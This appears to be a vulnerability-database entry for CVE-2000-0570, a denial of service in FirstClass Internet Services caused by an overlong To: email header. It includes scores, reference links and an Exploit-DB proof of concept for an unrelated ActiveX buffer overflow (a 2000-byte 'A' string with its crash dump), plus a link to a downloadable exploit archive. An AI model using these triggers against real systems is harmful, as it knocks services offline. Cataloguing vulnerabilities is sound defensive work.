CVE-2000-0570
published 2000-06-27CVE-2000-0570: FirstClass Internet Services server 5.770, and other versions before 6.1, allows remote attackers to cause a denial of service by sending an email with a long…
PriorityP414medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.14%
86.3th percentile
FirstClass Internet Services server 5.770, and other versions before 6.1, allows remote attackers to cause a denial of service by sending an email with a long To: mail header.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| centrinity | firstclass_intranet_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
exploitdb·2007-05-14
CVE-2007-2648 Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
---
2007/05/14
Clever Database Comparer ActiveX version 2.2 Remote Buffer Overflow Exploit
url: http://www.clevercomponents.com/home/news.asp
price: from $49.99 to $149.19
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to these exploits.
Sub tryMe
buff = String(2000,"A")
test.ConnectToDatabase buff,"default", "default", "default", "default"
End Sub
faultmon dump:
12:58:35.492 pid=0570 tid=07FC EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
EAX=01D04141: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=41418282: ?? ??
Exploit-DB
Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service
exploitdb·2000-06-27
CVE-2000-0570 Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service
Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service
---
source: https://www.securityfocus.com/bid/1421/info
If an E-mail containing an excessively long To: field in the header (~1.5 MB) is processed by First Class Intranet Services (FCIS), a Denial of Service can occur.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20052.tar.gz
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-06/0295.htmlhttp://www.osvdb.org/5718http://www.securityfocus.com/bid/1421https://exchange.xforce.ibmcloud.com/vulnerabilities/4843http://archives.neohapsis.com/archives/bugtraq/2000-06/0295.htmlhttp://www.osvdb.org/5718http://www.securityfocus.com/bid/1421https://exchange.xforce.ibmcloud.com/vulnerabilities/4843
2000-06-27
Published